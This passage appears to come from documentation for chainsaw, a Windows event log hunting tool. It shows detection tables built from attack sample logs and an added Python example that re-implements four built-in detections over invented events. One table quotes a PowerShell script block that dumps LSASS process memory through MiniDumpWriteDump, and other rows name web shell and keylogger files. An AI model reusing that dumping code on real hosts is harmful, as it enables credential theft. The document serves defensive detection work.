| 2019-07-18 20:40:00 | 1116 | "MSEDGEWIN10" | "Trojan:PowerShell/Powersploit.M" | `"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1"` | `"MSEDGEWIN10\\IEUser"` |
| 2019-07-18 20:40:16 | 1116 | "MSEDGEWIN10" | "Trojan:XML/Exeselrun.gen!A" | `"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl"` | `"MSEDGEWIN10\\IEUser"` |
| 2019-07-18 20:41:16 | 1116 | "MSEDGEWIN10" | "HackTool:JS/Jsprat" | `"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)"` | `"MSEDGEWIN10\\IEUser"` |
| 2019-07-18 20:41:17 | 1116 | "MSEDGEWIN10" | "Backdoor:ASP/Ace.T" | `"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx"` | `"MSEDGEWIN10\\IEUser"` |
| 2019-07-18 20:41:48 | 1116 | "MSEDGEWIN10" | "Trojan:Win32/Sehyioa.A!cl" | `"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll"` | `"MSEDGEWIN10\\IEUser"` |
| 2019-07-18 20:51:50 | 1116 | "MSEDGEWIN10" | "HackTool:JS/Jsprat" | `"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)"` | `"MSEDGEWIN10\\IEUser"` |

[+] Detection: Suspicious Image Load

| system_time | id | detection_rules | computer_name | Event.EventData.Image | image_loaded |
|---|---|---|---|---|---|
| 2019-04-27 18:47:00 | 7 | ‣ Execution from Suspicious Folder | "IEWIN7" | `C:\Users\Public\KeeFarce.exe` | `C:\Users\Public\BootstrapDLL.dll` |
| 2019-05-18 17:16:18 | 7 | ‣ In-memory PowerShell | "IEWIN7" | `C:\Windows\System32\notepad.exe` | `C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll` |
| 2019-05-23 17:26:08 | 7 | ‣ XSL Script Processing | "IEWIN7" | `\\vboxsrv\HTools\msxsl.exe` | `C:\Windows\System32\msxml3.dll` |
| 2019-06-14 22:22:31 | 7 | ‣ WMI Modules Loaded | "IEWIN7" | `C:\Users\IEUser\Downloads\a.exe` | `C:\Windows\System32\wbem\wmiutils.dll` |
| 2019-06-14 22:23:26 | 7 | ‣ WMI Modules Loaded | "IEWIN7" | `C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe` | `C:\Windows\System32\wbem\wmiutils.dll` |
| 2019-08-30 12:54:08 | 7 | ‣ WMI Modules Loaded | "MSEDGEWIN10" | `C:\Windows\System32\cscript.exe` | `C:\Windows\System32\wbem\wmiutils.dll` |
| 2020-08-02 16:24:07 | 7 | ‣ Fax Service DLL Search Order Hijack | "MSEDGEWIN10" | `C:\Windows\System32\FXSSVC.exe` | `C:\Windows\System32\Ualapi.dll` |
| 2020-10-15 13:17:02 | 7 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\Public\tools\apt\tendyron.exe` | `C:\Users\Public\tools\apt\OnKeyToken_KEB.dll` |
| 2020-10-17 11:43:28 | 7 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\Public\tools\apt\wwlib\test.exe` | `C:\Users\Public\tools\apt\wwlib\wwlib.dll` |
| 2020-10-17 11:43:28 | 7 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\Public\tools\apt\wwlib\test.exe` | `C:\Users\Public\tools\apt\wwlib\wwlib.dll` |
| 2020-10-17 11:43:31 | 7 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\Public\tools\apt\wwlib\test.exe` | `C:\Users\Public\tools\apt\wwlib\wwlib.dll` |
| 2020-10-17 11:43:31 | 7 | ‣ Execution from Suspicious Folder | "MSEDGEWIN10" | `C:\Users\Public\tools\apt\wwlib\test.exe` | `C:\Users\Public\tools\apt\wwlib\wwlib.dll` |

[+] Detection: Suspicious Powershell ScriptBlock

| system_time | id | detection_rules | computer_name | Event.EventData.ScriptBlockText |
|---|---|---|---|---|
| 2020-06-30 14:24:08 | 4104 | ‣ PowerShell Get-Process LSASS in ScriptBlock | "MSEDGEWIN10" | `function Memory($path){ $Process = Get-Process lsass$DumpFilePath = $path$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')$Flags = [Reflection.BindingFlags] 'NonPublic, Static'$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)$MiniDumpWithFullMemory = [UInt32] 2 #$ProcessId = $Process.Id$ProcessName = $Process.Name$ProcessHandle = $Process.Handle$ProcessFileName = "$($ProcessName).dmp"$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessId,$FileStream.SafeFileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero)) $FileStream.Close()if (-not $Result){$Exception = New-Object ComponentModel.Win32Exception$ExceptionMessage = "$($Exception.Message) ($($ProcessName):...` |

(use --full to show all content)

[+] Detection: System log was cleared

| system_time | id | computer | subject_user |
|---|---|---|---|
| 2019-03-19 23:34:25 | 104 | "PC01.example.corp" | "user01" |
| 2020-09-15 19:28:31 | 104 | "01566s-win16-ir.threebeesco.com" | "a-jbrown" |

[+] Detection: New User Created

| system_time | id | computer | target_username | user_sid |
|---|---|---|---|---|
| 2020-09-16 09:31:19 | 4720 | "01566s-win16-ir.threebeesco.com" | "$" | "S-1-5-21-308926384-506822093-3341789130-107103" |
| 2020-09-16 09:32:13 | 4720 | "01566s-win16-ir.threebeesco.com" | "$" | "S-1-5-21-308926384-506822093-3341789130-107104" |

[+] Detection: User added to interesting group

| system_time | id | computer | change_type | user_sid | target_group |
|---|---|---|---|---|---|
| 2019-09-22 11:22:05 | 4732 | "MSEDGEWIN10" | User added to local group | "S-1-5-21-3461203602-4096304019-2269080069-501" | "Administrators" |
| 2019-09-22 11:23:19 | 4732 | "MSEDGEWIN10" | User added to local group | "S-1-5-20" | "Administrators" |

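The last four tables above (Defender alerts, log clearing, new local users, and membership changes to sensitive groups) come from chainsaw's built-in detection logic rather than from Sigma rules. The script below is an added example, not code from the chainsaw project: it re-implements those four checks in Python over constructed records shaped like JSON-serialised EVTX events, so the columns chainsaw prints (`threat_name`, `subject_user`, `user_sid`, `target_group`) can be traced back to the underlying event fields. The event IDs and `EventData`/`UserData` field names follow the Windows event schema (Defender 1116 `Threat Name`/`Path`/`Detection User`; 104 and 1102 `LogFileCleared.SubjectUserName`; 4720 `TargetUserName`/`TargetSid`; 4728/4732/4756 `MemberSid` with the group name in `TargetUserName`); the hostnames, SIDs, paths and timestamps in `SAMPLE_EVENTS` are invented, and `SENSITIVE_GROUPS` is this example's own assumption, not chainsaw's list.

```python
"""Added example (not chainsaw's own code): a minimal re-implementation of four of
chainsaw's built-in detections, run over constructed JSON-shaped EVTX records."""

# Assumption for this example: groups whose membership changes are worth flagging.
SENSITIVE_GROUPS = {
    "Administrators", "Domain Admins", "Enterprise Admins",
    "Backup Operators", "Remote Desktop Users",
}

# 4728 / 4732 / 4756 are "member added" for global / local / universal security groups.
GROUP_ADD_SCOPE = {4728: "global", 4732: "local", 4756: "universal"}


def make_event(event_id, when, computer, provider, channel, data, section="EventData"):
    """Build one record in the nested Event.System / Event.<section> shape (constructed)."""
    return {"Event": {
        "System": {"EventID": event_id, "TimeCreated": {"SystemTime": when},
                   "Computer": computer, "Provider": {"Name": provider}, "Channel": channel},
        section: data,
    }}


# Constructed sample log: every host name, SID, path and time below is invented.
SAMPLE_EVENTS = [
    # Defender alert, Microsoft-Windows-Windows Defender/Operational event 1116
    make_event(1116, "2021-01-05T09:12:00Z", "WS01.corp.example", "Microsoft-Windows-Windows Defender",
               "Microsoft-Windows-Windows Defender/Operational",
               {"Threat Name": "HackTool:PowerShell/Mimikatz",
                "Path": "file:_C:\\Users\\alice\\Downloads\\Invoke-Mimikatz.ps1",
                "Detection User": "CORP\\alice"}),
    # System log cleared: event 104 from the Eventlog provider; its data sits under UserData
    make_event(104, "2021-01-05T09:20:31Z", "WS01.corp.example", "Microsoft-Windows-Eventlog", "System",
               {"LogFileCleared": {"SubjectUserName": "alice", "Channel": "System"}}, section="UserData"),
    # Security log cleared: event 1102, also under UserData
    make_event(1102, "2021-01-05T09:20:35Z", "WS01.corp.example", "Microsoft-Windows-Eventlog", "Security",
               {"LogFileCleared": {"SubjectUserName": "alice"}}, section="UserData"),
    # Local account created: event 4720
    make_event(4720, "2021-01-05T09:25:10Z", "WS01.corp.example", "Microsoft-Windows-Security-Auditing", "Security",
               {"TargetUserName": "svc_update", "TargetSid": "S-1-5-21-111-222-333-1105",
                "SubjectUserName": "alice"}),
    # Member added to local Administrators: event 4732 (TargetUserName is the GROUP, MemberSid the member)
    make_event(4732, "2021-01-05T09:25:12Z", "WS01.corp.example", "Microsoft-Windows-Security-Auditing", "Security",
               {"MemberSid": "S-1-5-21-111-222-333-1105", "TargetUserName": "Administrators",
                "TargetSid": "S-1-5-32-544"}),
    # Member added to the built-in Users group: not sensitive, must not be reported
    make_event(4732, "2021-01-05T09:25:13Z", "WS01.corp.example", "Microsoft-Windows-Security-Auditing", "Security",
               {"MemberSid": "S-1-5-21-111-222-333-1105", "TargetUserName": "Users",
                "TargetSid": "S-1-5-32-545"}),
]


def hunt(events):
    """Return one row per detection, keyed like the columns in chainsaw's tables."""
    rows = []
    for rec in events:
        system = rec["Event"]["System"]
        eid = system["EventID"]
        data = rec["Event"].get("EventData", {})
        base = {"system_time": system["TimeCreated"]["SystemTime"], "id": eid,
                "computer": system["Computer"]}

        if eid == 1116 and system["Provider"]["Name"] == "Microsoft-Windows-Windows Defender":
            rows.append({**base, "detection": "Windows Defender Detections",
                         "threat_name": data["Threat Name"], "threat_file": data["Path"],
                         "user": data["Detection User"]})
        elif eid in (104, 1102):
            cleared = rec["Event"].get("UserData", {}).get("LogFileCleared", {})
            # 104 names the cleared channel itself; 1102 is only ever written for the Security log.
            log = cleared.get("Channel", "Security") if eid == 104 else "Security"
            rows.append({**base, "detection": f"{log} log was cleared",
                         "subject_user": cleared.get("SubjectUserName", "")})
        elif eid == 4720:
            rows.append({**base, "detection": "New User Created",
                         "target_username": data["TargetUserName"], "user_sid": data["TargetSid"]})
        elif eid in GROUP_ADD_SCOPE and data.get("TargetUserName") in SENSITIVE_GROUPS:
            rows.append({**base, "detection": "User added to interesting group",
                         "change_type": f"User added to {GROUP_ADD_SCOPE[eid]} group",
                         "user_sid": data["MemberSid"], "target_group": data["TargetUserName"]})
    return rows


def by_detection(rows):
    """Group rows under a '[+] Detection: ...' banner, as chainsaw prints them."""
    grouped = {}
    for row in rows:
        grouped.setdefault(row["detection"], []).append(row)
    return grouped


if __name__ == "__main__":
    for name, hits in by_detection(hunt(SAMPLE_EVENTS)).items():
        print(f"[+] Detection: {name}")
        for hit in hits:
            print("   ", " | ".join(f"{k}={v}" for k, v in hit.items() if k != "detection"))
```

Running it prints five hits under four banners and silently drops the 4732 that adds the account to `Users`; point `hunt()` at records produced by a real EVTX-to-JSON export (one event per object, same `Event.System`/`Event.EventData` nesting) and the same logic applies unchanged.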
- EVTX-ATTACK-SAMPLES by SBousseaden
- Sigma detection rules
- EVTX parser library by @OBenamram
- TAU Engine Library by @AlexKornitzer